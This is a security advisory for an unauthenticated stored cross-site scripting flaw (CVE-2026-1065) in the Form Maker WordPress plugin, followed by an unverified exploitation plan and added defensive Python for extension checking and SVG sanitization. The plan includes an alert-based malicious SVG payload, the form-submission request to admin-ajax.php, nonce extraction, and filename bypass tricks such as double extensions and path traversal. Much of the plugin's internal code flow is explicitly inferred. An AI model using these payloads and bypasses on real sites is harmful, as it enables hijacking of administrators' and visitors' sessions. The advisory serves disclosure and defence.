CVE-2026-1065

Form Maker by 10Web <= 1.15.35 - Unauthenticated Stored Cross-Site Scripting via SVG file

Severity: high
CWE: Unrestricted Upload of File with Dangerous Type
CVSS Score: 7.2
Patched in: 1.15.36
Time to patch: 1 day

Description

The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.15.35. This is due to the plugin's default file upload allowlist including SVG files, combined with weak substring-based extension validation. This makes it possible for unauthenticated attackers, provided they can submit a form that contains a file upload field, to upload malicious SVG files containing JavaScript that executes when an administrator or site visitor views the uploaded file.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.15.35
Published: February 2, 2026
Last updated: February 3, 2026
Affected plugin: form-maker

Source Code

WordPress.org SVN

Research Plan (unverified)


This research plan outlines the process for exploiting a Stored Cross-Site Scripting (XSS) vulnerability in Form Maker by 10Web (<= 1.15.35) via malicious SVG file uploads.


1. Vulnerability Summary

The vulnerability arises because the plugin allows unauthenticated users to upload SVG files through form fields. While the plugin attempts to validate file extensions, its validation logic is weak (likely substring-based or improperly configured allowlist), and it fails to sanitize the content of SVG files. Since SVG is an XML-based image format, it can embed <script> tags. When an administrator views the submission or a visitor accesses the file URL directly, the embedded JavaScript executes in the context of the site.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php (for unauthenticated form submission).
  • Action: wp_ajax_nopriv_form_maker_submit_form or form_maker_save (inferred).
  • Payload Parameter: A multipart/form-data file upload field associated with a specific form.
  • Preconditions:
    • A form must be created that includes a "File Upload" field.
    • The "Allow Extensions" setting for that field must include svg (which is often allowed by default or easily bypassed due to weak validation).
    • The form must be published on a public-facing page.

3. Code Flow (Inferred)

  1. Entry Point: FormMakerController::form_maker_submit_form (or similar AJAX handler) is triggered via admin-ajax.php.
  2. Form Processing: The plugin identifies the form ID from the request and retrieves field definitions.
  3. Upload Handling: The plugin iterates through $_FILES. It calls a validation function (likely in models/FormMakerModel.php or a dedicated upload class).
  4. Weak Validation: The extension check likely uses a pattern like if (strpos($file_name, '.svg') !== false) or includes svg in a default $allowed_extensions array without subsequent sanitization via kses or a dedicated SVG sanitizer.
  5. Storage: The file is moved to wp-content/uploads/form-maker-uploads/ using move_uploaded_file.
  6. Persistence: The file path is stored in the {prefix}_form_maker_submits table.
  7. Sink: When the uploaded file URL is visited, the browser renders the SVG and executes the script.
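The weak check inferred in step 4 beside a hardened replacement, as an added example in Python that is not the plugin's code. The strpos-style substring pattern is the page's own inference; the allowlist contents beyond svg and the list of executable inner segments are assumptions made for this example.

```python
# Extensions the page says the plugin allows by default (SVG among them).
# Only "svg" is confirmed by the advisory; the rest is assumed for the example.
DEFAULT_ALLOWED = frozenset({"jpg", "jpeg", "png", "gif", "pdf", "svg"})
# Hardened allowlist: SVG is only safe to accept if it is sanitized after upload.
HARDENED_ALLOWED = DEFAULT_ALLOWED - {"svg"}

# Dot-separated segments that must never appear anywhere in a stored name:
# Apache mod_mime can assign a handler from any segment, not only the last one.
# Assumed list for the example.
EXECUTABLE_SEGMENTS = frozenset(
    {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "py"}
)


def weak_extension_ok(filename: str, allowed=DEFAULT_ALLOWED) -> bool:
    """Substring check of the kind the page infers (hypothetical, not the
    plugin's code): passes if ".svg" appears anywhere in the name, so
    "xss.svg.php" and "../../../xss.svg" are accepted."""
    name = filename.lower()
    return any("." + ext in name for ext in allowed)


def strict_extension_ok(filename: str, allowed=HARDENED_ALLOWED) -> bool:
    """Hardened check: a bare base name, the final extension alone decides,
    no trailing dot or whitespace, no empty segment, no executable segment."""
    if filename != filename.strip() or filename.endswith("."):
        return False
    # Path separators and control characters (including NUL) are never legitimate.
    if any(ord(c) < 32 or c in "/\\" for c in filename):
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2 or any(not p for p in parts):   # ".htaccess", "a..b"
        return False
    if any(p in EXECUTABLE_SEGMENTS for p in parts[1:-1]):  # "a.php.jpg"
        return False
    return parts[-1] in allowed


def compare(names):
    """Map each candidate name to (weak result, strict result with SVG allowed)."""
    return {n: (weak_extension_ok(n), strict_extension_ok(n, DEFAULT_ALLOWED))
            for n in names}


if __name__ == "__main__":
    probes = ["xss.svg", "xss.svg.php", "xss.svg.", "../../../xss.svg",
              "a.php.jpg", "photo.jpg"]
    for name, (weak, strict) in compare(probes).items():
        print("%-20s weak=%-5s strict=%s" % (name, weak, strict))
```

Even the strict variant still admits SVG when it is in the allowlist; the extension check only closes the bypasses in section 9, and the stored-XSS issue itself is only fixed by removing svg from the default allowlist or sanitizing the SVG body.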

4. Nonce Acquisition Strategy

The Form Maker plugin typically requires a nonce for form submission to prevent CSRF, even for unauthenticated users.

  1. Identify Shortcode: The plugin uses [formmaker id="ID_HERE"].
  2. Setup Page:
    wp post create --post_type=page --post_title="Contact" --post_status=publish --post_content='[formmaker id="1"]'
    
  3. Navigate: Open the newly created page in a browser.
  4. Extract Nonce:
    The plugin usually localizes script data; read the nonce from the browser console:
    • Variable Name (Inferred): window.fm_object_1 or window.form_maker_obj.
    • Key (Inferred): nonce or form_maker_submit_nonce.
    • Console: window.fm_object_1?.nonce
  5. Identify Field Names: In the browser, inspect the file upload field's name attribute. It usually follows the pattern form_id_temp_1 or type_file_X.

5. Exploitation Strategy

Step 1: Create the Malicious SVG

Create a file named xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert('CVE-2026-1065 XSS');
   </script>
</svg>

Step 2: Submit the Form

Perform a multipart/form-data POST request to admin-ajax.php.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (Multipart):
    • action: form_maker_submit_form (verify via grep -r "wp_ajax_nopriv")
    • form_id: 1
    • nonce: [EXTRACTED_NONCE]
    • type_file_1: xss.svg (The file upload field)
    • submit_form_1: 1

Step 3: Triggering XSS

  1. Navigate to the WordPress Admin dashboard: wp-admin/admin.php?page=submissions_fm.
  2. Select the form and view the latest submission.
  3. Click the link to the uploaded file, or copy the file URL and visit it directly.

6. Test Data Setup

  1. Initialize Form:
    The plugin creates default forms on activation. Ensure Form ID 1 exists.
  2. Add File Upload Field:
    If Form 1 doesn't have a file upload field, use wp eval to add one to the form's metadata or use the plugin's logic to insert a field into the form_maker table.
    • Field Type: type_file
    • Allowed Extensions: svg,jpg,jpeg,png
  3. Publish Page:
    wp post create --post_type=page --post_status=publish --post_content='[formmaker id="1"]'
    

7. Expected Results

  • The server response should indicate a successful submission (e.g., {"status":"success"} or a redirect/success message HTML).
  • The file xss.svg should exist in wp-content/uploads/form-maker-uploads/.
  • Directly accessing the SVG file URL in the browser should trigger an alert() box.

8. Verification Steps

  1. Check Filesystem:
    ls -R /var/www/html/wp-content/uploads/form-maker-uploads/ | grep xss.svg
    
  2. Check Database Submissions:
    wp db query "SELECT * FROM wp_form_maker_submits ORDER BY id DESC LIMIT 1;"
    
  3. Check Response Headers:
    Verify the file is served as image/svg+xml.
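A triage script for the verification step, as an added example (not part of the research plan or the plugin): it walks an uploads directory, flags SVG files that carry script elements, event-handler attributes, script-scheme hrefs or DTD entities, and shows the sanitization a plugin would need before it could safely keep svg in its allowlist. The sample files are constructed for the example; the first reproduces the page's xss.svg payload. The element and attribute lists are the example's own choice, not an exhaustive SVG threat model.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that make an SVG executable or let it embed foreign content (assumed list).
ACTIVE_ELEMENTS = frozenset({"script", "foreignObject", "iframe", "embed", "object", "handler"})
# Script-capable URL schemes in href / xlink:href (both have local name "href").
BAD_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)

# Constructed samples for the example. "xss.svg" is the page's payload, trimmed.
SAMPLES = {
    "xss.svg": b'<?xml version="1.0" standalone="no"?>\n'
               b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n'
               b'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">'
               b'<rect width="300" height="100"/>'
               b'<script type="text/javascript">alert("CVE-2026-1065 XSS");</script></svg>',
    "onload.svg": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><circle r="4"/></svg>',
    "photo.jpg.svg": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                     b'<a xlink:href="javascript:alert(1)"><text y="10">click</text></a></svg>',
    "benign.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>',
}


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list:
    """Return the reasons this SVG is not a passive image (empty list = clean)."""
    findings = []
    if b"<!ENTITY" in data:          # entity tricks live in the DTD, outside the tree
        findings.append("DOCTYPE declares entities")
    try:
        root = ET.fromstring(data)   # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if _local(root.tag) != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append("<%s> element" % tag)
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append("event handler %s on <%s>" % (name, tag))
            elif name == "href" and BAD_SCHEME.match(value):
                findings.append("%s=%r on <%s>" % (name, value[:40], tag))
    return findings


def sanitize_svg(data: bytes) -> bytes:
    """Drop active elements, event handlers and script-scheme hrefs, then
    re-serialize. The DOCTYPE (and any entities) is lost in the process."""
    root = ET.fromstring(data)
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in ACTIVE_ELEMENTS:
                parent.remove(child)
    for el in root.iter():
        for attr in list(el.attrib):
            name = _local(attr)
            if name.lower().startswith("on") or (name == "href" and BAD_SCHEME.match(el.attrib[attr])):
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8")


def scan_uploads(directory: str) -> dict:
    """Walk an uploads directory (e.g. wp-content/uploads/form-maker-uploads/) and
    report every file that is SVG by name or by content and has findings."""
    report = {}
    for dirpath, _, files in os.walk(directory):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                data = fh.read()
            if fn.lower().endswith(".svg") or b"<svg" in data[:1024].lower():
                findings = svg_findings(data)
                if findings:
                    report[path] = findings
    return report


def demo() -> dict:
    """Write the constructed samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLES.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(body)
        report = scan_uploads(tmp)
    return {os.path.basename(p): f for p, f in report.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", "; ".join(findings))
    print(sanitize_svg(SAMPLES["xss.svg"]).decode())
```

Run it against the real directory with scan_uploads("/var/www/html/wp-content/uploads/form-maker-uploads/"); the content sniff catches files whose name was bypassed past the extension check (section 9), and the response-header check in step 3 above still matters, because only a file served as image/svg+xml renders as a document in the browser.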

9. Alternative Approaches

  • Extension Bypass: If .svg is blocked, try xss.svg.php (if the check is substring-based) or xss.svg. (trailing dot).
  • Double Extension: xss.jpg.svg.
  • SVG via XML: If the upload handler checks the file header for "real" images, ensure the SVG starts with <?xml or <svg.
  • Path Traversal: Check if the filename parameter in the multipart request allows path traversal (e.g., filename="../../../xss.svg") to move the file outside the restricted directory.

Research Findings (static analysis, not yet PoC-verified)

Summary

The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to 1.15.35 due to unsafe handling of SVG uploads. The plugin's file upload validation fails to sanitize SVG content and uses weak extension checks, allowing unauthenticated attackers to upload SVG files containing malicious JavaScript that executes when accessed by a user or administrator.

Exploit Outline

  1. Identify a public page containing a Form Maker form with a file upload field.
  2. Extract the submission nonce and form ID, which are typically localized in JavaScript objects such as fm_object_1 on the page.
  3. Create a malicious SVG file containing an embedded JavaScript payload, such as: <svg xmlns="http://www.w3.org/2000/svg"><script>alert('XSS')</script></svg>
  4. Submit a multipart/form-data POST request to the WordPress AJAX endpoint (admin-ajax.php) using the action form_maker_submit_form (or the corresponding AJAX handler) with the nonce, form ID, and the malicious SVG file attached to the file upload parameter.
  5. Locate the resulting file path (typically within wp-content/uploads/form-maker-uploads/) and access the URL directly, or wait for an administrator to view the submission in the plugin's Submissions dashboard to trigger script execution.
